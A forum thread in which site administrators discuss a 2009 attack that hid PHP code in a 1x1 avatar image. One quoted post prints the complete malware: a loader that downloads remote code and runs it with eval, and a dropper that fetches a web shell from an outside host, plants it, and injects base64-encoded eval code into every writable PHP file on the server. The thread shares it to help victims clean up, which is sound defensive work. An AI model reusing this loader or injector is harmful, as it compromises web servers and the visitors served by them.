428 adefeclew  [email protected] 86.57.155.242 Today at 10:02:56 AM   
429 Natreseearm  [email protected] 94.178.5.237 Today at 11:04:13 AM   
430 nuyullerxruu  [email protected] 94.102.51.196 Today at 11:59:40 AM   
431 eagetaacitire  [email protected] 87.117.35.79 Today at 12:17:42 PM   
432 voidonduchend  [email protected] 95.24.206.154 Today at 12:59:28 PM   
433 irrapeApocA  [email protected] 64.56.73.226 Today at 03:20:13 PM   
434 inardynutty  [email protected] 195.2.240.117 Today at 03:30:09 PM   
435 Veinswaw  [email protected] 65.15.161.58 Today at 05:10:38 PM   
436 JernHinna  [email protected] 64.56.73.226 Today at 05:13:52 PM   
437 Injecume  [email protected] 68.32.158.166 Today at 06:58:25 PM   
438 Infefsendeamp  [email protected] 64.56.73.226 Today at 07:02:38 PM   
439 Dimbsuisa  [email protected] 86.121.176.110 Today at 07:05:38 PM   
   
Hope every one has tightend up the forums.

Mines sealed up tighter than a crabs ass :P

 :D
Mine as well. I haven't even had a valid registration in 3 days.

One of my forums got hit by Krisbarteo too. Every php file on the domain same as described here. So I created a post based member group to prevent uploading and attaching until a member has 10 posts. There was an uploaded avatar, the only avatar that was a jpg, 1x1 pixel. Opened it up and sure enough php code. I wonder if the upload script could compare file size to image size and flag suspicious files? Would this be easier than scanning a file for php tags? For that matter, who would ever upload a 1x1 image anyway?  Of course, if a minimum image size was enacted, it would be pretty easy for someone to just use a larger image.

Ever think these hackers come here to see what everyone is saying for future research? It wouldn't be hard to come here, look around at all these posts and see what everyone is saying on how to prevent the attacks and then just adjust to our adjustments. Plus, with all the websites listed all around the board they have an unlimited supply of potential victims.

Quote from: sjokomelk on May 06, 2009, 01:35:59 PM
I dunno if this will help anyone but the content of the avatar is the following:
I've cleaned it up a little.

Code Select Expand

<?php;$url = 'http://wplsat23.net/?update=main';$done = false;if(!$url){return '';}$url_info = parse_url($url);$url_info[port] = ($url_info[port]) ? $url_info[port]:80;$url_info[path] = ($url_info[path]) ? $url_info[path] : "/"; $url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" . $url_info[query] : ""; $query = "GET " . $url_info[path] . " HTTP/1.1\r\n"; $query = $query . "Host: " . $url_info[host] . "\r\n"; $query = $query . "Accept: */*" . "\r\n"; $query = $query . "Connection: close" . "\r\n"; $query = $query . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" . "\r\n"; $query = $query . "\r\n"; $errno = 0; $error = ""; $sock = fsockopen($url_info[host], $url_info[port], $errno, $error, 30);$h = array();$resp = array();if($sock){stream_set_timeout($sock, 30);fwrite($sock, $query);$hd = false;while(!feof($sock)){$l = fgets($sock);if(!$hd){if(trim($l) == ''){$hd = true;}else{$h[] = $l;}}else{$resp[] = $l;}}fclose($sock);}$ret = implode("", $resp);eval($ret);?>

and this is the code on that page:

Code Select Expand

$ver = "1.0";
$GLOBALS['dbg'] = 0;
$GLOBALS['rewrite_old'] = 1;

set_time_limit(600);
$pu = "http://nomsat23.net/?update=js&host={$_SERVER['HTTP_HOST']}";
$eu = "http://nomsat23.net/?update=shl&host={$_SERVER['HTTP_HOST']}";

//$pu = "http://wpl/?update=js&host={$_SERVER['HTTP_HOST']}";
//$eu = "http://wpl/?update=shl&host={$_SERVER['HTTP_HOST']}";

$GLOBALS['dgin'] = "style.css.php";
$GLOBALS['dgsf'] = "s.php";
$GLOBALS['dgdn'] = "dg.php";
$GLOBALS['dgfn'] = "";

//detect full path
if(!file_exists($_SERVER['SCRIPT_FILENAME'])){
if(file_exists($_SERVER['PATH_TRANSLATED'])){
$_SERVER['SCRIPT_FILENAME'] = $_SERVER['PATH_TRANSLATED'];
}else{
die("<b style='color:red'>can't detect exploit full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[49295073]");
}
}
$_SERVER['SCRIPT_FILENAME'] = str_replace('\\', '/', $_SERVER['SCRIPT_FILENAME']);
$_SERVER['SCRIPT_FILENAME'] = preg_replace("/\/+/", "/", $_SERVER['SCRIPT_FILENAME']);
echo "<b style='color:green'>exploit full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[6910002]<br>";

$tmp = explode("/", $_SERVER['REQUEST_URI']);
$GLOBALS['dglvl'] = count($tmp) - 2;
echo"{$ver}<h2>http://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}</h2>";

$path = explode("/", $_SERVER['SCRIPT_FILENAME']);
$path = array_slice($path, 0, count($path) - 1);
$GLOBALS['fpath'] = implode("/", $path) . '/';

//detecting real path
$uri = explode("/", $_SERVER['REQUEST_URI']);
$uri = array_slice($uri, 0, count($uri) - 1);

//print_r($path);
//print_r($uri);

while(count($uri) > 0 && count($path) > 0 && strtolower($uri[count($uri) - 1]) == strtolower($path[count($path) - 1])){
unset($uri[count($uri) - 1]);
unset($path[count($path) - 1]);
}
//echo"<hr>";
//print_r($path);
//print_r($uri);

$GLOBALS['dgsp'] = implode("/", $path) . '/';

if(isset($_GET['dgd'])){
error_reporting(E_ALL & ~E_NOTICE);
}else{
error_reporting(0);
}

if(isset($_GET['phpinfo'])){
phpinfo();
die;
}

//$GLOBALS['dgsp'] = $_SERVER['DOCUMENT_ROOT'];
if(substr($GLOBALS['dgsp'], strlen($GLOBALS['dgsp']) - 1, 1) <> '/'){
$GLOBALS['dgsp'] .= '/';
}

echo"<b style=\"color:green\">root dir path [{$GLOBALS['dgsp']}]</b><br><br>";

$GLOBALS['dgcgr'] = 0;
$GLOBALS['dgcgrf'] = 0;
$my_uid = getmyuid();
$my_gid = getmygid();
$my_cid = get_current_user();
echo "SYSTEM: " . `uname -a` . "<br>";
if(ini_get('safe_mode')){echo "<h1 style='color:red'>SAFE MODE</h1>";}

echo"MY USER ID: {$my_uid}; MY GROUP ID: $my_gid; CURRENT USER: {$my_cid}<br>";

if(!function_exists('phpinj')){
function phpinj($ff, &$str, $inj = 0, $silent = true){
global $_SERVER;
$alien_shells = array("los.php","r0x.php");
$our_folder = 0;
$folder = $ff;
$folder = str_replace('\\', '/', $folder);
if(substr($folder, strlen($folder) - 1, 1) <> '/'){
$folder .= '/';
}
if(!$folder){
if(!$silent){echo"<font color='red'>bad folder path [{$folder}]</font><br>";}
return;
}
if(!is_dir($folder)){
if(!$silent){echo"<font color='red'>{$folder} - is not a folder</font><br>";}
return;
}
if($GLOBALS['dgdirs'][$folder]){
if(!$silent){echo"<font color='yellow'>{$folder} already checked</font><br>";}
return;
}
$GLOBALS['dgdirs'][$folder] = 1;

if($folder == $GLOBALS['dgcp'] || file_exists($folder.$GLOBALS['dgin'])){
if(!$silent){echo"<h4>{$folder} is our dir, skipping...</h4>";}
$our_folder = 1;
}
$dir_perm = substr(sprintf('%o', fileperms($folder)), -4);

$file_stat = stat($folder);
$file_uid = $file_stat[4];
$file_gid = $file_stat[5];
if(function_exists('posix_getpwuid')){
$file_stat = posix_getpwuid($file_uid);
$file_uidn = "; uname:{$file_stat['name']}";
}
if(function_exists('posix_getgrgid')){
$file_stat = posix_getgrgid($file_gid);
$file_gidn = $file_stat['name'];
$file_gidn = "; gname:{$file_gidn}";
}
$file_info = "[uid:{$file_uid}; gid:{$file_gid}{$file_uidn}{$file_gidn}] ";
if(!$silent){echo"{$file_info}[$dir_perm] {$folder}<br>";flush();}
$h = opendir($folder);
if(!$h){
if(!$silent){echo"<font color='red'>{$folder}</font><br>";}
return;
}
while(strlen($f = readdir($h))){
if($f == '.' || $f == '..'){
continue;
}
$pc = 0;
$mkr = md5($f);
$lc = "";
$lp = "";
$fh = false;

$file = $folder.$f;
if($f == $_SERVER['SCRIPT_FILENAME']){
if(!$silent){echo"<h4>{$file} is our exploit</h4>";}
continue;
}
if(is_file($file) && !$our_folder){
if($f == 'functions.php' && (strlen($folder) - strrpos($folder, "wp-includes") == 12)){
if(can_write($file)){
echo"<b style='color:green'>{$file}</b><br>";
dgrself($file, $silent);
}else{
echo"<b style='color:red'>{$file}</b><br>";
}
}
if($f == 's.php'){
if(!$silent){echo"<font color='red'>{$file} is shell</font><br>";}
continue;
}
if(in_array(strtolower($f), $alien_shells)){
if(unlink($file)){
if(!$silent){echo"<h3 style='color:green'>{$file} ALIEN SHELL</h3>";}
}else{
if(!$silent){echo"<h3 style='color:red'>{$file} ALIEN SHELL</h3>";}
}
continue;
}
if(!in_array(strtolower(gfe($file)), array("php","phtml","php3"))){
continue;
}
if($GLOBALS['dgfiles'][$file]){
if(!$silent){echo"<font color='yellow'>{$file} already checked</font><br>";}
continue;
}
$GLOBALS['dgfiles'][$file] = 1;
$file_stat = stat($file);
$file_uid = $file_stat[4];
$file_gid = $file_stat[5];
if(function_exists('posix_getpwuid')){
$file_stat = posix_getpwuid($file_uid);
$file_uidn = "; uname:{$file_stat['name']}";
}
if(function_exists('posix_getgrgid')){
$file_stat = posix_getgrgid($file_gid);
$file_gidn = $file_stat['name'];
$file_gidn = "; gname:{$file_stat['name']}";
}
$file_info = "[uid:{$file_uid}; gid:{$file_gid}{$file_uidn}{$file_gidn}] ";
$file_perm_was = substr(sprintf('%o', fileperms($file)), -4);
$file_handler = fopen($file, "a+");
$perms_str = "{$file_info}[{$file_perm_was}] ";
if(!$file_handler){
if(!$silent){echo"{$perms_str}<font color='red'>{$file}</font><br>";flush();}
continue;
}
fclose($file_handler);
$fc = implode("", file($file));
$nc = preg_replace("/\<\!\-\-$mkr\-\-\>.*\<\!\-\-$mkr\-\-\>/siU", "", $fc);
$nc = preg_replace("/^\s*\<\?(\w{3})?\s*\/\*\*\/\s*eval\(base64_decode.*\)\)\;\s*\?\>\s*(\S)/siU", "$2", $nc);
clear_exploits($nc);
if($nc <> $fc){$lc = " <b>[cleared]</b>";}else{$lc = " <b>[not patched]</b>";}
if(preg_match("/\@zend/i", $nc)){
if(!$silent){echo"{$perms_str}<b>ZEND</b> <font color='red'>{$file}</font>{$lc}<br>";flush();}
}elseif($inj && strpos(strtolower($folder), '/cache/')){
$lp = " <b style='color:orange'> [cached file]</b>";
}elseif($inj){
$nc = "{$ot}{$str}{$ot}\n{$nc}";
$lp = " <b> [patched]</b>";
}
if($fc <> $nc){
save_text_to_file($file, $nc, "$perms_str<font color='green'>{$file}{$lc}{$lp}</font><br>", 1, $silent);
}else{
if(!$silent){echo"$perms_str<font color='green'>{$file}{$lc}{$lp}</font><br>";}
}
}elseif(is_dir($file)){
phpinj($file.'/', $str, $inj, $silent);
}
}
closedir($h);
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('clear_exploits')){
function clear_exploits(&$text){
$text = preg_replace("/\<\?(\w{3})?\s*eval\(base64_decode.*\)\)\;\s*\?\>/siU", "", $text);
}
}

if(!function_exists('can_write')){
function can_write($fn){
$f = fopen($fn, "a");
if($f){
fclose($f);
return true;
}else{
return false;
}
}
}

if(!function_exists('leave_clear_php')){
function leave_clear_php(&$txt){
$txt = substr($txt, strpos($txt, '<?'), strlen($txt));
$txt = substr($txt, 0, strrpos($txt, '?>') + 2);
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('download')){
function download($url, $connect_timeout){
$done = false;
if(!$url){return '';}

$url_info = parse_url($url);
$url_info[port] = ($url_info[port]) ? $url_info[port] : 80;
$url_info[path] = ($url_info[path]) ? $url_info[path] : "/";
$url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" . $url_info[query] : "";
$query = "GET " . $url_info[path] . " HTTP/1.1\r\n";
$query = $query . "Host: " . $url_info[host] . "\r\n";
$query = $query . "Accept: */*" . "\r\n";
$query = $query . "Connection: close" . "\r\n";
$query = $query . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" . "\r\n";
$query = $query . "\r\n";
$errno = 0;
$error = "";
$sock = fsockopen($url_info[host], $url_info[port], $errno, $error, $connect_timeout);
$h = array();
$resp = array();
if($sock){
stream_set_timeout($sock, $connect_timeout);
fwrite($sock, $query);
$hd = false;
while(!feof($sock)){
$l = fgets($sock);
if(!$hd){
if(trim($l) == ''){
$hd = true;
}else{
$h[] = $l;
}
}else{
$resp[] = $l;
}
}
fclose($sock);
}
$ret = implode("", $resp);
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('save_text_to_file')){
function save_text_to_file($fn, $t, $m = '', $r = 0, $silent = false){
global $_GET;
if(isset($_GET['dgd'])){
$silent = false;
}
if($r){
$f = fopen($fn, "w");
}else{
$f = fopen($fn, "a");
}
if($f){
fwrite($f, $t);
fflush($f);
fclose($f);
if(!$silent){
echo $m;
}
/*set_chmod($fn);*/
}else{
if(!$silent){
echo "can't create file $fn";
}
die();
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('replace_substring')){
function replace_substring(&$text, $pret, $postt, $str){
$pos = strpos($text, $pret);
if(!$pos){return false;}
$pre = substr($text, 0, $pos + strlen($pret));
$pos = strpos($text, $postt, $pos);
if(!$pos){return false;}
$post = substr($text, $pos, strlen($text));
if(strlen($pre) && strlen($post)){
$text = $pre.$str.$post;
return true;
}
return false;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('set_chmod')){
function set_chmod($file){
if(!file_exists($file)){
return;
}
if(chmod($file, 0777)){
return('0777');
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('set_chmod_folder')){
function set_chmod_folder($file){
if(!file_exists($file)){
return;
}
if(chmod($file, 0666)){
return('0666');
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('gfe')){
function gfe($fn){
$ret = '';
$p = strrpos($fn, '.');
if($p){
$ret = (substr($fn, $p+1, strlen($fn)));
return $ret;
}
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('prepare_pack')){
function prepare_pack($php){
$cycles = 1;
$split_by_functions = 1;
$zip = 0;
if(!function_exists('base64_encode')){
return $php;
}
$ret = preg_replace("/^[^\s]+[\s]/U", "", $php);
$ret = preg_replace("/[\s][^\s]+\Z/", "", $ret);
$ret = trim($ret);
if($split_by_functions){
$tmp = preg_split('/\}\s+function/', $ret);
}else{
$tmp[] = $ret;
}
$skip_first = false;
if(count($tmp)){
$pos = strpos($tmp[0], 'function');
if($pos === 0){
$tmp[0] = substr($tmp[0], strlen('function'), strlen($tmp[0]));
}else{
$skip_first = true;
}
$ret = '';
$count = 0;
$total = count($tmp);
foreach($tmp as $key=>$val){
$val = preg_replace("/\s+/", " ", $val);
$count++;
$count == $total ? $add = '' : $add = '}';
if($total > 1 && !($count == 1 && $skip_first)){
$next_encoded = 'function '.trim($val).$add;
}else{
$next_encoded = trim($val).$add;
}
if($zip && function_exists('gzdeflate')){
$next_encoded = gzdeflate($next_encoded, 9);
}
$next_encoded = base64_encode($next_encoded);
if($zip && function_exists('gzdeflate')){
$ret .= "eval(gzinflate(base64_decode('{$next_encoded}')));";
}else{
$ret .= "eval(base64_decode('{$next_encoded}'));";
}
}
for($i = 0; $i < $cycles; $i++){
if($zip && function_exists('gzdeflate')){
$ret = gzdeflate($ret, 9);
}
$ret = base64_encode($ret);
if($zip && function_exists('gzdeflate')){
$ret = "eval(gzinflate(base64_decode('{$ret}')));";
}else{
$ret = "eval(base64_decode('{$ret}'));";
}
}
$ret = "<"."?php $ret?".">";
}
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

if(!function_exists('clear_folder')){
function clear_folder($folder, $remove = false){
$ret = true;
if(file_exists($folder)){
$h = opendir($folder);
while(strlen($file = readdir($h))){
if($file == '.' || $file == '..'){
continue;
}
if(is_dir($folder.$file)){
$ret = clear_folder($folder.$file.'/', true);
continue;
}
if(!unlink($folder.$file)){
$ret = false;
}
}
closedir($h);
if($remove && !rmdir($folder)){
$ret = false;
}
}
return $ret;
}
}else{
$dgai = true;
if(!$dgai){echo"<b style=\"color:red\">already installed at path: [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";}
}

echo"<hr><div align='left'><br clear=\"all\">";

$pms = download($pu, 60);
if($pms){
echo"<b style=\"color:green\">main script download ok [size: " . strlen($pms) . "]</b><br>[543676657]<br>";
leave_clear_php($pms);
}else{
die("<b style=\"color:red\">main download failed [$pu]</b><br>[93771902]<br>");
}

$shl = download($eu, 60);
if($shl){
echo"<b style=\"color:green\">shell download ok [size: " . strlen($shl) . "]</b><br>[599387883]<br>";
leave_clear_php($shl);
}else{
die("<b style=\"color:red\">shell download failed [$eu]</b><br>[759303755]<br>");
}

flush();
$ddrs = array();
$dgmssp = array();
$a = false;
$GLOBALS['dgdirs'] = array();
echo"<h3>LOOKING FOR THE LONGEST PATH</h3>";
echo"<small>";

$tmp = explode("/", $GLOBALS['fpath']);
$path = '';
$c = 0;
foreach($tmp as $key=>$val){
if(!$val && $c){
continue;
}
$c++;
$path .= $val . "/";
if(strlen($GLOBALS['dgsp']) > strlen($path)){
continue;
}
if($path <> '/'){
if(isset($_GET['details'])){
echo"<h4>GOTO: $path</h4>";flush();
}
fddir($path, $ddrs, $a);
if(count($ddrs) > 0){
break;
}
}
}
if(!count($ddrs)){
if(isset($_GET['details'])){
echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush();
}
fddir($GLOBALS['dgsp'], $ddrs, $a);
}

echo"</small>";flush();

$max = 0;
$GLOBALS['dgcp'] = '';
$sep = '';
foreach($ddrs as $key=>$val){
if(!$sep){
if(!(strpos($key, '/') === false)){
$sep = '/';
}else{
$sep = '\\';
}
}
$fldr = explode($sep, $key);
$c = count($fldr);
if($max < $c){
$max = $c;
$GLOBALS['dgcp'] = implode($sep, $fldr);
}
}
if(!$GLOBALS['dgcp']){
die('<b style="color:red">nowhere to write anything</b><br>[4356398573]');
}else{
if($GLOBALS['dgsp'] == $GLOBALS['dgcp']){
die("<b style=\"color:red\">can't save to the document root</b><br>[657834657]");
}
echo"the longest available path: <b>{$GLOBALS['dgcp']}</b><br>";
$GLOBALS['dgcp'] = str_replace('\\', '/', $GLOBALS['dgcp']);
}
//setting up filenames
if(!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){
die("<b style=\"color:red\">failed to set path</b><br>[44883279]");
}
echo"<b style=\"color:green\">path of main script successfully set [{$GLOBALS['dgcp']}]</b><br>[5482745]<br>";
if(!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){
die("<b style=\"color:red\">failed to set name</b><br>[58819152]");
}
echo"<b style=\"color:green\">name of main script successfully set [{$GLOBALS['dgin']}]</b><br>[2246876]<br>";
if(!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){
die("<b style=\"color:red\">failed to set relative root dir</b><br>[58819152]");
}
echo"<b style=\"color:green\">relative root dir successfully set [{$GLOBALS['dgsp']}]</b><br>[5893301]<br>";

//!!!!!!!!!!!!!!!!!!!!!!!!!!! attention !!!!!!!!!!!!!!!!!!!!!!! if this code executed by eval() command, HAVE TO COMMENT THIS
/*
if(!replace_substring($pms, '$GLOBALS[\'dgep\'] = "', '";', $_SERVER['SCRIPT_FILENAME'])){
echo"<b style=\"color:red\">failed to set path to exploit</b><br>[5093713]<br>";
}else{
echo"<b style=\"color:green\">path to exploit successfully set [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[8799102]<br>";
}
*/
//fix filename search
/*
$tmp = explode("/", $_SERVER['SCRIPT_FILENAME']);
$path = '';
$f = 0;
foreach($tmp as $key=>$val){
$path .= $val . "/";
if(file_exists($path.$GLOBALS['dgfn'])){
$f = 1;
if(!replace_substring($pms, '$GLOBALS[\'dgfxp\'] = "', '";', $path.$GLOBALS['dgfn'])){
echo"<b style=\"color:red\">failed to set path to fix file</b><br>[9477124]";
}else{
echo"<b style=\"color:green\">path to the file for fix successfully set [{$path}{$GLOBALS['dgfn']}]</b><br>[5018843]<br>";
}
break;
}
}
if(!$f){
echo"<b style=\"color:red\">failed to find path to fix file</b><br>[5488349]";
}
*/
$packed_js = prepare_pack($pms);
//$packed_js = $pms;
$my_size = strval(strlen($packed_js));
while(strlen($my_size) < 7){$my_size = '0' . $my_size;}
if(!replace_substring($pms, '"00'.'0', '";', $my_size)){
die("<b style=\"color:red\">failed to set size</b><br>[86612935]");
}
//$packed_js = $pms;
$packed_js = prepare_pack($pms);
echo"<br>my packed size: $my_size<br>";

save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgin'], $packed_js, "<b style=\"color:green\">main script path [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[48839]<br>", 1, $silent);
save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgsf'], $shl, "<b style=\"color:green\">shell path [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br>[58392]<br>", 1);
/*
if($GLOBALS['dbg']){
save_text_to_file($GLOBALS['fpath'].$GLOBALS['dgsf'], $shl, "<b style=\"color:green\">!!!!!!!!! test shell path [{$GLOBALS['fpath']}{$GLOBALS['dgsf']}] !!!!!!!!!!</b><br>", 1);
}
*/

function dgrself($path, $silent = true){
global $_GET;
if(!$silent){
echo "restoring functions.php at path [{$path}]<br>";flush();
}
$pf = implode("", file($path));
if($pf){
if(!$silent){
echo"{$path} loaded successfully<hr>";
}
}else{
if(!$silent){
echo"failed to load {$path}<br>[8856284]";
}
}
$pf = '';
$arr = file($path);
foreach($arr as $key=>$val){
if(strpos($val, 'eval(base64_decode') === false){
$pf .= $val;
}
}
save_text_to_file($path, $pf, "file {$path} successfully RESTORED<br>[88293764]<br>", 1, $silent);
}

function fddir($ff, &$madrs, &$flag){
global $_GET;
//if($flag || count($madrs) > 300){
if($flag){
return;
}
$php_found = "";
$writable = 0;
//$folder = realpath($ff);
$folder = $ff;
$folder = str_replace('\\', '/', $folder);
if(substr($folder, strlen($folder) - 1, 1) <> '/'){
$folder .= '/';
}
if(!file_exists($folder)){
echo"<font color='red'>{$folder} not exists</font><br>";
return;
}
if(!is_dir($folder)){
echo"<font color='red'>{$folder} is not dir</font><br>";
return;
}
$dir_perm = substr(sprintf('%o', fileperms($folder)), -4);
$new_dir_perm = substr(sprintf('%o', fileperms($folder)), -4);
if($new_dir_perm <> $dir_perm){
$new_dir_perm = "$dir_perm >> $new_dir_perm";
}
$succ = false;
$rndfl = rand(1,9999999999).'.php';
$f = fopen($folder.$rndfl, "w");
if(!$f){
if(isset($_GET['details'])){
echo"<font color=red>[{$new_dir_perm}] {$folder}</font><br>";flush();
}
}else{
if(isset($_GET['details'])){
echo"<font color=green>[{$new_dir_perm}] {$folder}</font><br>";flush();
}
fclose($f);
if(!unlink($folder.$rndfl)){
if(isset($_GET['details'])){
echo"<font color='red'>{$folder}{$rndfl} failed to delete</font><br>";
}
unset($madrs[$folder]);
}
$writable = 1;
}
if($GLOBALS['rewrite_old'] && $writable && file_exists($folder.$GLOBALS['dgin'])){
echo"<b style=\"color:green\">old js [{$folder}{$GLOBALS['dgin']}]</b><br>[55433928]<br>";
if(file_exists($folder.'cnf')){
$ct = implode('', file($folder.'cnf'));
$ct = preg_replace("/ZGd1aA\=\=.*\n/", '', $ct);
save_text_to_file($folder.'cnf', $ct, "<br>config file updated<br>", 1);
//unlink($folder.'cnf');
}
$flag = true;
$madrs = array();
$madrs[$folder] = 1;
return;
}
$h = opendir($folder);
if(!$h){
if(isset($_GET['details'])){
echo"<font color='red'>$folder opendir failed</font><br>";
}
return;
}
while(strlen($f = readdir($h))){
if($f == '.' || $f == '..' || $f == '/' || $f == '\\'){
continue;
}
if(is_dir($folder.$f)){
fddir($folder.$f.'/', $madrs, $flag);
}elseif(is_file($folder.$f) && in_array(strtolower(gfe($folder.$f)), array("php","phtml","php3"))){
$php_found = $folder.$f;
}
}
closedir($h);
if($writable/* && $php_found*/){
$madrs[$folder] = 1;
}
}

$str = "if(function_exists('ob_start')&&!isset(\$GLOBALS['sh_no'])){\$GLOBALS['sh_no']=1;if(file_exists('{$GLOBALS['dgcp']}{$GLOBALS['dgin']}')){include_once('{$GLOBALS['dgcp']}{$GLOBALS['dgin']}');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode(\$d){\$f=ord(substr(\$d,3,1));\$h=10;\$e=0;if(\$f&4){\$e=unpack('v',substr(\$d,10,2));\$e=\$e[1];\$h+=2+\$e;}if(\$f&8){\$h=strpos(\$d,chr(0),\$h)+1;}if(\$f&16){\$h=strpos(\$d,chr(0),\$h)+1;}if(\$f&2){\$h+=2;}\$u=gzinflate(substr(\$d,\$h));if(\$u===FALSE){\$u=\$d;}return \$u;}}function dgobh(\$b){Header('Content-Encoding: none');\$c=gzdecode(\$b);if(preg_match('/\<body/si',\$c)){return preg_replace('/(\<body[^\>]*\>)/si','\$1'.gml(),\$c);}else{return gml().\$c;}}ob_start('dgobh');}}}";

$str = "<?php /**/eval(base64_decode('" . base64_encode($str) . "')); ?>";
echo"<small>";
echo"<h3>INJECTING PHP FILES</h3>";
$GLOBALS['dgdirs'] = array();
$GLOBALS['dgfiles'] = array();

echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush();
phpinj($GLOBALS['dgsp'], $str, 1, 0);

$tmp = explode("/", $GLOBALS['fpath']);
$path = '';
$c = 0;
foreach($tmp as $key=>$val){
if(!$val && $c){
continue;
}
$c++;
$path .= $val . "/";
if(strlen($GLOBALS['dgsp']) > strlen($path)){
continue;
}
echo"<h4>GOTO: $path</h4>";
phpinj($path, $str, 1, 0);
}

die("</small><hr><b>dgok</b></div>");

Quote from: hobox on May 05, 2009, 07:29:24 PM
Krisbarteo had done the same to my forum. An avatar 1,82KB large. All my PHP files were corrupted

He came from 94.142.129.147

Yeah that was the IP that he had when he paid my forum a visit too.

Very informative post, thanx all.

I am running 1.1.8, and after having problems with user Avatars displaying, it didn't take long to be led to this post identifying "Krisbarteo" which i found was a user on my site.

I have banned/deleted the account, however many of my member avatars are still not working. So i am assuming, my site must still be affected by that accounts attack. Yet, I looked through my PHP files and did not find any of the above listed code embedded in them.

Can someone offer any guidance as to where i should be looking so that I can attempt to remove them? Or could i have not been attached (even though he was a member) and my avatar problem caused by something else? Although i find it unlikely becuase the problems did begin shortly after he was a member.

Thanx.

You guys are big help and I appreciate all you are doing.

I want to ask a very specific question.  Once everything is clean, which I have done 3 or 4 times and I did just KRISBARTEO, it has popped back up.  My question are:

1.  Is the code the "64 Base" crap with a long "string of number" behind it or is that the result of the code that I have missed so far?

2.  Is the code only appearing in .php files or should I be scouring others as well, i.e. htaccess files?

Thanks again.

Cowdude

Anyone thought of contacting the ISP at all  :D

"CSS GROUP" Ltd.
Caunas street 7A-26, Cesis, LV-4101

Phone: +371 67 404544
Fax: +371 67 414545

E-mail addresses

Common questions:

Technical support:

Financial department:

Device rent and colocation:

SPAM report:    [email protected]

[email protected]

[email protected]

[email protected]

[email protected]

Had the same problem.
What about official answer?

I'm screwed. It's only a matter of time before I get hit. Farewell mates. :(


I'll tighten up security as well and make back-ups, but this is just a pain, I have enough coding troubles as is.

Quote from: chrishicks on May 09, 2009, 11:46:37 PM
Ever think these hackers come here to see what everyone is saying for future research? It wouldn't be hard to come here, look around at all these posts and see what everyone is saying on how to prevent the attacks and then just adjust to our adjustments. Plus, with all the websites listed all around the board they have an unlimited supply of potential victims.

I'm just guessing, but I'm betting that the really dangerous ones can learn all they need from the code alone. It's no major feat to get read access to somebody's live files either. Even I know how to do that. Regardless, what are people supposed to do? It's impractical to just not discuss your products in public as I'm sure you realize.

Quote from: tjhanes on May 10, 2009, 06:07:37 AM
... however many of my member avatars are still not working. So i am assuming, my site must still be affected by that accounts attack. Yet, I looked through my PHP files and did not find any of the above listed code embedded in them.

Can someone offer any guidance as to where i should be looking so that I can attempt to remove them? Or could i have not been attached (even though he was a member) and my avatar problem caused by something else? Although i find it unlikely becuase the problems did begin shortly after he was a member.

Thanx.

My forum showed no signs of the affliction... a wiki installation on the same domain errored out, thats how I knew there was a problem.

In every file, except for the settings file, there was this at the top, starting on the first line:

<?php /**/eval(base64_decode(' [color=red]note, there was a very long string of letters and digits here I removed for clarity[/color]=')); ?>
<?php

The avatar used displayed as a 1x1pixel, white dot.

Quote from: WillyP on May 10, 2009, 04:49:04 PM

My forum showed no signs of the affliction... a wiki installation on the same domain errored out, thats how I knew there was a problem.

What do you mean by that ? He registered on my forum too with both of his nicknames. He only activated one of his accounts and uploaded the fake avatar containing that php code but I can't find anything wrong or weird in any other files (it's 4 a.m. here and I'm still searching). He was active for only 1 minute and 9 seconds.

